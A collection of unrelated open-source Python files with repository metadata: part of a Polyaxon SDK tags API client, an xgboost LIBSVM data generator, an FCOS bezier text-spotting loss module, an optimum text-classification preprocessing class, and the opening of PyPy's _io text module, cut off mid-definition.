asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_tag_with_http_info(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'tag_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `patch_tag`") # noqa: E501
# verify the required parameter 'tag_name' is set
if self.api_client.client_side_validation and ('tag_name' not in local_var_params or # noqa: E501
local_var_params['tag_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `tag_name` when calling `patch_tag`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `patch_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'tag_name' in local_var_params:
path_params['tag.name'] = local_var_params['tag_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{tag.name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def sync_tags(self, owner, body, **kwargs): # noqa: E501
"""Sync tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.sync_tags(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1EntitiesTags body: Data (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.sync_tags_with_http_info(owner, body, **kwargs) # noqa: E501
def sync_tags_with_http_info(self, owner, body, **kwargs): # noqa: E501
"""Sync tags # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.sync_tags_with_http_info(owner, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param V1EntitiesTags body: Data (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method sync_tags" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `sync_tags`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `sync_tags`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/sync', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_tag(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Update tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tag(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1Tag
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_tag_with_http_info(owner, tag_name, body, **kwargs) # noqa: E501
def update_tag_with_http_info(self, owner, tag_name, body, **kwargs): # noqa: E501
"""Update tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_tag_with_http_info(owner, tag_name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str owner: Owner of the namespace (required)
:param str tag_name: Tag name (required)
:param V1Tag body: Tag body (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1Tag, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'owner',
'tag_name',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_tag" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'owner' is set
if self.api_client.client_side_validation and ('owner' not in local_var_params or # noqa: E501
local_var_params['owner'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `owner` when calling `update_tag`") # noqa: E501
# verify the required parameter 'tag_name' is set
if self.api_client.client_side_validation and ('tag_name' not in local_var_params or # noqa: E501
local_var_params['tag_name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `tag_name` when calling `update_tag`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_tag`") # noqa: E501
collection_formats = {}
path_params = {}
if 'owner' in local_var_params:
path_params['owner'] = local_var_params['owner'] # noqa: E501
if 'tag_name' in local_var_params:
path_params['tag.name'] = local_var_params['tag_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/v1/orgs/{owner}/tags/{tag.name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Tag', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
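# Hedged usage sketch (not part of the generated client): create a tag with an
# API-key-authenticated client. The host URL, token, owner, and the
# Configuration/V1Tag names and fields assume the standard OpenAPI-generator
# package layout used by this SDK.
def _example_create_tag():
    import polyaxon_sdk
    configuration = polyaxon_sdk.Configuration(host="https://cloud.polyaxon.com")
    configuration.api_key['ApiKey'] = 'YOUR_TOKEN'
    configuration.api_key_prefix['ApiKey'] = 'token'
    with polyaxon_sdk.ApiClient(configuration) as api_client:
        api = polyaxon_sdk.TagsV1Api(api_client)
        tag = polyaxon_sdk.V1Tag(name="research")
        return api.create_tag(owner="my-org", body=tag)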
|
tests/benchmark/generate_libsvm.py | bclehmann/xgboost | 23,866 | 66655 |
"""Generate synthetic data in LIBSVM format."""
import argparse
import io
import time
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
RNG = np.random.RandomState(2019)
def generate_data(args):
"""Generates the data."""
print("Generating dataset: {} rows * {} columns".format(args.rows, args.columns))
print("Sparsity {}".format(args.sparsity))
print("{}/{} train/test split".format(1.0 - args.test_size, args.test_size))
tmp = time.time()
n_informative = args.columns * 7 // 10
n_redundant = args.columns // 10
n_repeated = args.columns // 10
print("n_informative: {}, n_redundant: {}, n_repeated: {}".format(n_informative, n_redundant,
n_repeated))
x, y = make_classification(n_samples=args.rows, n_features=args.columns,
n_informative=n_informative, n_redundant=n_redundant,
n_repeated=n_repeated, shuffle=False, random_state=RNG)
print("Generate Time: {} seconds".format(time.time() - tmp))
tmp = time.time()
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=args.test_size,
random_state=RNG, shuffle=False)
print("Train/Test Split Time: {} seconds".format(time.time() - tmp))
tmp = time.time()
write_file('train.libsvm', x_train, y_train, args.sparsity)
print("Write Train Time: {} seconds".format(time.time() - tmp))
tmp = time.time()
write_file('test.libsvm', x_test, y_test, args.sparsity)
print("Write Test Time: {} seconds".format(time.time() - tmp))
def write_file(filename, x_data, y_data, sparsity):
with open(filename, 'w') as f:
for x, y in zip(x_data, y_data):
write_line(f, x, y, sparsity)
def write_line(f, x, y, sparsity):
with io.StringIO() as line:
line.write(str(y))
for i, col in enumerate(x):
if 0.0 < sparsity < 1.0:
if RNG.uniform(0, 1) > sparsity:
write_feature(line, i, col)
else:
write_feature(line, i, col)
line.write('\n')
f.write(line.getvalue())
def write_feature(line, index, feature):
line.write(' ')
line.write(str(index))
line.write(':')
line.write(str(feature))
def main():
"""The main function.
Defines and parses command line arguments and calls the generator.
"""
parser = argparse.ArgumentParser()
parser.add_argument('--rows', type=int, default=1000000)
parser.add_argument('--columns', type=int, default=50)
parser.add_argument('--sparsity', type=float, default=0.0)
parser.add_argument('--test_size', type=float, default=0.01)
args = parser.parse_args()
generate_data(args)
if __name__ == '__main__':
main()
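# Example invocation (values are illustrative); writes train.libsvm and
# test.libsvm to the current directory in "label index:value index:value ..."
# LIBSVM format:
#
#   python generate_libsvm.py --rows 100000 --columns 50 --sparsity 0.2 --test_size 0.01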
|
maskrcnn_benchmark/modeling/rpn/fcos/loss.py | Yuliang-Liu/bezier_curve_text_spotting | 423 | 66666 |
"""
This file contains specific functions for computing losses of FCOS
file
"""
import torch
from torch import nn
from torch.nn import functional as F
from maskrcnn_benchmark.layers import IOULoss
from maskrcnn_benchmark.layers import SigmoidFocalLoss
from maskrcnn_benchmark.utils.comm import reduce_sum, get_world_size
from maskrcnn_benchmark.layers import smooth_l1_loss
INF = 100000000
class FCOSLossComputation(object):
"""
This class computes the FCOS losses.
"""
def __init__(self, cfg):
self.cls_loss_func = SigmoidFocalLoss(
cfg.MODEL.FCOS.LOSS_GAMMA,
cfg.MODEL.FCOS.LOSS_ALPHA
)
self.center_sample = cfg.MODEL.FCOS.CENTER_SAMPLE
self.strides = cfg.MODEL.FCOS.FPN_STRIDES
self.radius = cfg.MODEL.FCOS.POS_RADIUS
self.loc_loss_type = cfg.MODEL.FCOS.LOC_LOSS_TYPE
# we make use of IOU Loss for bounding boxes regression,
# but we found that L1 in log scale can yield a similar performance
self.box_reg_loss_func = IOULoss(self.loc_loss_type)
self.centerness_loss_func = nn.BCEWithLogitsLoss(reduction="sum")
# generate sizes of interest
soi = []
prev_size = -1
for s in cfg.MODEL.FCOS.SIZES_OF_INTEREST:
soi.append([prev_size, s])
prev_size = s
soi.append([prev_size, INF])
self.object_sizes_of_interest = soi
def get_sample_region(self, gt, strides, num_points_per, gt_xs, gt_ys, radius=1):
num_gts = gt.shape[0]
K = len(gt_xs)
gt = gt[None].expand(K, num_gts, 4)
center_x = (gt[..., 0] + gt[..., 2]) / 2
center_y = (gt[..., 1] + gt[..., 3]) / 2
center_gt = gt.new_zeros(gt.shape)
# no gt
if center_x[..., 0].sum() == 0:
return gt_xs.new_zeros(gt_xs.shape, dtype=torch.uint8)
beg = 0
for level, n_p in enumerate(num_points_per):
end = beg + n_p
stride = strides[level] * radius
xmin = center_x[beg:end] - stride
ymin = center_y[beg:end] - stride
xmax = center_x[beg:end] + stride
ymax = center_y[beg:end] + stride
# limit sample region in gt
center_gt[beg:end, :, 0] = torch.where(xmin > gt[beg:end, :, 0], xmin, gt[beg:end, :, 0])
center_gt[beg:end, :, 1] = torch.where(ymin > gt[beg:end, :, 1], ymin, gt[beg:end, :, 1])
center_gt[beg:end, :, 2] = torch.where(xmax > gt[beg:end, :, 2], gt[beg:end, :, 2], xmax)
center_gt[beg:end, :, 3] = torch.where(ymax > gt[beg:end, :, 3], gt[beg:end, :, 3], ymax)
beg = end
left = gt_xs[:, None] - center_gt[..., 0]
right = center_gt[..., 2] - gt_xs[:, None]
top = gt_ys[:, None] - center_gt[..., 1]
bottom = center_gt[..., 3] - gt_ys[:, None]
center_bbox = torch.stack((left, top, right, bottom), -1)
inside_gt_bbox_mask = center_bbox.min(-1)[0] > 0
return inside_gt_bbox_mask
def prepare_targets(self, points, targets):
object_sizes_of_interest = self.object_sizes_of_interest
expanded_object_sizes_of_interest = []
for l, points_per_level in enumerate(points):
object_sizes_of_interest_per_level = \
points_per_level.new_tensor(object_sizes_of_interest[l])
expanded_object_sizes_of_interest.append(
object_sizes_of_interest_per_level[None].expand(len(points_per_level), -1)
)
expanded_object_sizes_of_interest = torch.cat(expanded_object_sizes_of_interest, dim=0)
num_points_per_level = [len(points_per_level) for points_per_level in points]
self.num_points_per_level = num_points_per_level
points_all_level = torch.cat(points, dim=0)
labels, reg_targets, bezier_targets = self.compute_targets_for_locations(
points_all_level, targets, expanded_object_sizes_of_interest
)
for i in range(len(labels)):
labels[i] = torch.split(labels[i], num_points_per_level, dim=0)
reg_targets[i] = torch.split(reg_targets[i], num_points_per_level, dim=0)
bezier_targets[i] = torch.split(bezier_targets[i], num_points_per_level, dim=0)
labels_level_first = []
reg_targets_level_first = []
bezier_targets_level_first = []
for level in range(len(points)):
labels_level_first.append(
torch.cat([labels_per_im[level] for labels_per_im in labels], dim=0)
)
# normalize regression targets
reg_targets_level_first.append(
torch.cat([reg_targets_per_im[level]
for reg_targets_per_im in reg_targets],
dim=0) / self.strides[level]
)
bezier_targets_level_first.append(
torch.cat([bezier_targets_per_im[level]
for bezier_targets_per_im in bezier_targets],
dim=0) / self.strides[level]
)
return labels_level_first, reg_targets_level_first, bezier_targets_level_first
def compute_targets_for_locations(self, locations, targets, object_sizes_of_interest):
labels = []
reg_targets = []
bezier_targets = []
xs, ys = locations[:, 0], locations[:, 1]
for im_i in range(len(targets)):
targets_per_im = targets[im_i]
assert targets_per_im.mode == "xyxy"
bboxes = targets_per_im.bbox
labels_per_im = targets_per_im.get_field("labels")
area = targets_per_im.area()
l = xs[:, None] - bboxes[:, 0][None]
t = ys[:, None] - bboxes[:, 1][None]
r = bboxes[:, 2][None] - xs[:, None]
b = bboxes[:, 3][None] - ys[:, None]
reg_targets_per_im = torch.stack([l, t, r, b], dim=2)
            # bezier targets are offsets from each location to the 8 control points
bezier_pts = targets_per_im.get_field("beziers").bbox.view(-1, 8, 2)
y_targets = bezier_pts[:, :, 0][None] - ys[:, None, None]
x_targets = bezier_pts[:, :, 1][None] - xs[:, None, None]
bezier_targets_per_im = torch.stack((y_targets, x_targets), dim=3)
bezier_targets_per_im = bezier_targets_per_im.view(xs.size(0), bboxes.size(0), 16)
if self.center_sample:
is_in_boxes = self.get_sample_region(
bboxes, self.strides, self.num_points_per_level,
xs, ys, radius=self.radius)
else:
is_in_boxes = reg_targets_per_im.min(dim=2)[0] > 0
max_reg_targets_per_im = reg_targets_per_im.max(dim=2)[0]
# limit the regression range for each location
is_cared_in_the_level = \
(max_reg_targets_per_im >= object_sizes_of_interest[:, [0]]) & \
(max_reg_targets_per_im <= object_sizes_of_interest[:, [1]])
locations_to_gt_area = area[None].repeat(len(locations), 1)
locations_to_gt_area[is_in_boxes == 0] = INF
locations_to_gt_area[is_cared_in_the_level == 0] = INF
            # if there is still more than one object for a location,
            # we choose the one with minimal area
            locations_to_min_area, locations_to_gt_inds = locations_to_gt_area.min(dim=1)
reg_targets_per_im = reg_targets_per_im[range(len(locations)), locations_to_gt_inds]
bezier_targets_per_im = bezier_targets_per_im[range(len(locations)), locations_to_gt_inds]
labels_per_im = labels_per_im[locations_to_gt_inds]
            labels_per_im[locations_to_min_area == INF] = 0
labels.append(labels_per_im)
reg_targets.append(reg_targets_per_im)
bezier_targets.append(bezier_targets_per_im)
return labels, reg_targets, bezier_targets
def compute_centerness_targets(self, reg_targets):
left_right = reg_targets[:, [0, 2]]
top_bottom = reg_targets[:, [1, 3]]
centerness = (left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0]) * \
(top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
return torch.sqrt(centerness)
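    # Hedged worked example of the centerness definition above (numbers are
    # illustrative): for a location with reg_targets = [l, t, r, b] = [2, 2, 4, 4],
    # centerness = sqrt((min(2, 4) / max(2, 4)) * (min(2, 4) / max(2, 4)))
    #            = sqrt(0.25) = 0.5;
    # it reaches 1.0 at the exact box centre (l == r, t == b) and 0.0 on a box edge.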
def __call__(self, locations, box_cls, box_regression, bezier_regression, centerness, targets):
"""
Arguments:
locations (list[BoxList])
box_cls (list[Tensor])
box_regression (list[Tensor])
centerness (list[Tensor])
targets (list[BoxList])
Returns:
cls_loss (Tensor)
reg_loss (Tensor)
centerness_loss (Tensor)
"""
num_classes = box_cls[0].size(1)
labels, reg_targets, bezier_targets = self.prepare_targets(locations, targets)
box_cls_flatten = []
box_regression_flatten = []
bezier_regression_flatten = []
centerness_flatten = []
labels_flatten = []
reg_targets_flatten = []
bezier_targets_flatten = []
for l in range(len(labels)):
box_cls_flatten.append(box_cls[l].permute(0, 2, 3, 1).reshape(-1, num_classes))
box_regression_flatten.append(box_regression[l].permute(0, 2, 3, 1).reshape(-1, 4))
bezier_regression_flatten.append(bezier_regression[l].permute(0, 2, 3, 1).reshape(-1, 16))
labels_flatten.append(labels[l].reshape(-1))
reg_targets_flatten.append(reg_targets[l].reshape(-1, 4))
bezier_targets_flatten.append(bezier_targets[l].reshape(-1, 16))
centerness_flatten.append(centerness[l].reshape(-1))
box_cls_flatten = torch.cat(box_cls_flatten, dim=0)
box_regression_flatten = torch.cat(box_regression_flatten, dim=0)
bezier_regression_flatten = torch.cat(bezier_regression_flatten, dim=0)
centerness_flatten = torch.cat(centerness_flatten, dim=0)
labels_flatten = torch.cat(labels_flatten, dim=0)
reg_targets_flatten = torch.cat(reg_targets_flatten, dim=0)
bezier_targets_flatten = torch.cat(bezier_targets_flatten, dim=0)
pos_inds = torch.nonzero(labels_flatten > 0).squeeze(1)
num_pos_per_gpu = pos_inds.numel()
num_gpus = get_world_size()
total_num_pos = reduce_sum(pos_inds.new_tensor([num_pos_per_gpu])).item()
box_regression_flatten = box_regression_flatten[pos_inds]
bezier_regression_flatten = bezier_regression_flatten[pos_inds]
reg_targets_flatten = reg_targets_flatten[pos_inds]
bezier_targets_flatten = bezier_targets_flatten[pos_inds]
centerness_flatten = centerness_flatten[pos_inds]
cls_loss = self.cls_loss_func(
box_cls_flatten,
labels_flatten.int()
        ) / max(total_num_pos / num_gpus, 1.0)  # clamp the normalizer to avoid dividing by zero
if pos_inds.numel() > 0:
centerness_targets = self.compute_centerness_targets(reg_targets_flatten)
sum_centerness_targets = centerness_targets.sum()
sum_centerness_targets = reduce_sum(sum_centerness_targets).item()
reg_loss = self.box_reg_loss_func(
box_regression_flatten,
reg_targets_flatten,
centerness_targets
) / (sum_centerness_targets / num_gpus)
centerness_loss = self.centerness_loss_func(
centerness_flatten,
centerness_targets
) / max(total_num_pos / num_gpus, 1.0)
            bezier_loss = F.smooth_l1_loss(
                bezier_regression_flatten, bezier_targets_flatten, reduction="none")
            # weight the bezier loss by centerness, like the box regression loss
            bezier_loss = ((bezier_loss.mean(dim=-1) * centerness_targets).sum()
                           / (sum_centerness_targets / num_gpus))
        else:
            reg_loss = box_regression_flatten.sum()
            bezier_loss = bezier_regression_flatten.sum()
            reduce_sum(centerness_flatten.new_tensor([0.0]))
            centerness_loss = centerness_flatten.sum()
return cls_loss, reg_loss, bezier_loss, centerness_loss
def compute_offsets_targets(self, mask_targets, reg_targets):
num_chars = mask_targets.sum(dim=1).long()
N, K = mask_targets.size()
offsets_x = torch.zeros(N, K, dtype=torch.float32, device=mask_targets.device)
offsets_y = torch.zeros(N, K, dtype=torch.float32, device=mask_targets.device)
for i, (nc, reg) in enumerate(zip(num_chars, reg_targets)):
xs = (reg[2] + reg[0]) * (torch.tensor(list(range(nc)),
dtype=torch.float32,
device=mask_targets.device) * 2 + 1) / (nc * 2) - reg[0]
offsets_x[i, :nc] = xs
offsets_y[i, :nc] = (reg[3] - reg[1]) / 2
return torch.stack((offsets_y, offsets_x), dim=2).view(N, -1)
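    # Hedged worked example for compute_offsets_targets (numbers are illustrative):
    # for a row with reg = [l, t, r, b] = [0, 0, 10, 4] and nc = 2 characters,
    # offsets_x spreads the character centres evenly across the box width
    # (l + r = 10): (r + l) * (2 * i + 1) / (2 * nc) - l gives 2.5 and 7.5,
    # while offsets_y is the constant vertical offset (b - t) / 2 = 2.0 for both.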
def make_fcos_loss_evaluator(cfg):
loss_evaluator = FCOSLossComputation(cfg)
return loss_evaluator
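# Hedged usage sketch (not part of the original file; cfg is assumed to be a
# maskrcnn_benchmark-style config carrying the MODEL.FCOS.* options referenced
# in __init__):
#
#   loss_evaluator = make_fcos_loss_evaluator(cfg)
#   cls_loss, reg_loss, bezier_loss, centerness_loss = loss_evaluator(
#       locations, box_cls, box_regression, bezier_regression, centerness, targets)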
|
optimum/utils/preprocessing/text_classification.py
|
huggingface/optimum
| 414 |
66675
|
<reponame>huggingface/optimum
from functools import partial
from typing import Dict, List
from datasets import Dataset, Metric, load_dataset
from transformers import PretrainedConfig, PreTrainedTokenizerBase, TextClassificationPipeline
from transformers.pipelines.text_classification import ClassificationFunction
from .base import DatasetProcessing
class TextClassificationProcessing(DatasetProcessing):
def __init__(self, **kwargs):
if "secondary" not in kwargs["data_keys"]:
kwargs["data_keys"]["secondary"] = None
super().__init__(**kwargs)
self.config = kwargs["config"]
self.label_to_id = None
def load_datasets(self):
# Downloading and loading a dataset from the hub.
raw_datasets = load_dataset(path=self.dataset_path, name=self.dataset_name)
max_eval_samples = 100 # TODO remove this
# Labels
if not self.task_args["is_regression"]:
label_list = raw_datasets[self.eval_split].features[self.ref_keys[0]].names
num_labels = len(label_list)
else:
num_labels = 1
if (
self.config.label2id != PretrainedConfig(num_labels=num_labels).label2id
and not self.task_args["is_regression"]
):
# Some have all caps in their config, some don't.
label_name_to_id = {k.lower(): v for k, v in self.config.label2id.items()}
if list(sorted(label_name_to_id.keys())) == list(sorted(label_list)):
self.label_to_id = {i: int(label_name_to_id[label_list[i]]) for i in range(num_labels)}
else:
print(
"Your model seems to have been trained with labels, but they don't match the dataset: ",
f"model labels: {list(sorted(label_name_to_id.keys()))}, dataset labels:"
f" {list(sorted(label_list))}.\nIgnoring the model labels as a result.",
)
# Preprocessing the raw_datasets
def preprocess_function(examples, data_keys: Dict[str, str], tokenizer: PreTrainedTokenizerBase):
# Tokenize the texts
tokenized_inputs = tokenizer(
text=examples[data_keys["primary"]],
text_pair=examples[data_keys["secondary"]] if data_keys["secondary"] else None,
padding="max_length",
max_length=tokenizer.model_max_length,
truncation=True,
)
return tokenized_inputs
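        # Hedged example of the expected data_keys layout (column names are
        # illustrative assumptions, not taken from this file): a sentence-pair
        # task such as MNLI might use
        #   data_keys={"primary": "premise", "secondary": "hypothesis"},
        # while a single-sentence task like SST-2 would pass
        #   data_keys={"primary": "sentence"}
        # and rely on the "secondary": None default filled in by __init__.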
eval_dataset = raw_datasets[self.eval_split]
if max_eval_samples is not None:
eval_dataset = eval_dataset.select(range(max_eval_samples))
datasets_dict = {"eval": eval_dataset}
if self.static_quantization:
assert self.calibration_split
# Run the tokenizer on the calibration dataset
calibration_dataset = raw_datasets[self.calibration_split].map(
partial(
preprocess_function,
tokenizer=self.tokenizer,
data_keys=self.data_keys,
),
batched=True,
load_from_cache_file=True,
desc="Running tokenizer on calibration dataset",
)
columns_to_remove = raw_datasets.column_names[self.calibration_split]
columns_to_remove = [name for name in columns_to_remove if name not in self.tokenizer.model_input_names]
calibration_dataset = calibration_dataset.remove_columns(columns_to_remove)
if self.num_calibration_samples is not None:
calibration_dataset = calibration_dataset.select(range(self.num_calibration_samples))
datasets_dict["calibration"] = calibration_dataset
return datasets_dict
def run_inference(self, eval_dataset: Dataset, pipeline: TextClassificationPipeline):
all_labels = []
all_preds = []
for _, inputs in enumerate(eval_dataset):
has_labels = all(inputs.get(k) is not None for k in self.ref_keys)
if has_labels:
labels = tuple(inputs.get(name) for name in self.ref_keys)
if len(labels) == 1:
labels = labels[0]
else:
raise ValueError("Only one label supported.")
else:
raise ValueError("Missing labels")
all_labels.append(labels)
# we manually unroll the pipeline since it is broken
# see https://github.com/huggingface/transformers/issues/17305
if self.data_keys["secondary"]:
inps = [inputs[self.data_keys["primary"]], inputs[self.data_keys["secondary"]]]
else:
inps = inputs[self.data_keys["primary"]]
tokenized_inputs = pipeline.preprocess([inps])
model_outputs = pipeline.forward(tokenized_inputs)
            # preds is a dict; no post-processing function is applied since the raw
            # score is all we need in the regression case
preds = pipeline.postprocess(model_outputs, function_to_apply=ClassificationFunction.NONE)
if not self.task_args["is_regression"]:
# the dataset label ids may be different from the label2id of predictions
if self.label_to_id is not None:
preds = self.config.label2id[preds["label"]]
preds = self.label_to_id[preds]
else:
preds = self.config.label2id[preds["label"]]
else:
preds = preds["score"]
all_preds.append(preds)
return all_labels, all_preds
def get_metrics(self, predictions: List, references: List, metric: Metric):
return metric.compute(predictions=predictions, references=references)
def get_pipeline_kwargs(self):
return {}
|
pypy/module/_io/interp_textio.py
|
m4sterchain/mesapy
| 381 |
66700
|
<gh_stars>100-1000
import sys
from pypy.interpreter.baseobjspace import W_Root
from pypy.interpreter.error import OperationError, oefmt
from pypy.interpreter.gateway import WrappedDefault, interp2app, unwrap_spec
from pypy.interpreter.typedef import (
GetSetProperty, TypeDef, generic_new_descr, interp_attrproperty,
interp_attrproperty_w)
from pypy.module._codecs import interp_codecs
from pypy.module._io.interp_iobase import W_IOBase, convert_size, trap_eintr
from rpython.rlib.rarithmetic import intmask, r_uint, r_ulonglong
from rpython.rlib.rbigint import rbigint
from rpython.rlib.rstring import UnicodeBuilder
STATE_ZERO, STATE_OK, STATE_DETACHED = range(3)
SEEN_CR = 1
SEEN_LF = 2
SEEN_CRLF = 4
SEEN_ALL = SEEN_CR | SEEN_LF | SEEN_CRLF
_WINDOWS = sys.platform == 'win32'
class W_IncrementalNewlineDecoder(W_Root):
seennl = 0
pendingcr = False
w_decoder = None
def __init__(self, space):
self.w_newlines_dict = {
SEEN_CR: space.newunicode(u"\r"),
SEEN_LF: space.newunicode(u"\n"),
SEEN_CRLF: space.newunicode(u"\r\n"),
SEEN_CR | SEEN_LF: space.newtuple(
[space.newunicode(u"\r"), space.newunicode(u"\n")]),
SEEN_CR | SEEN_CRLF: space.newtuple(
[space.newunicode(u"\r"), space.newunicode(u"\r\n")]),
SEEN_LF | SEEN_CRLF: space.newtuple(
[space.newunicode(u"\n"), space.newunicode(u"\r\n")]),
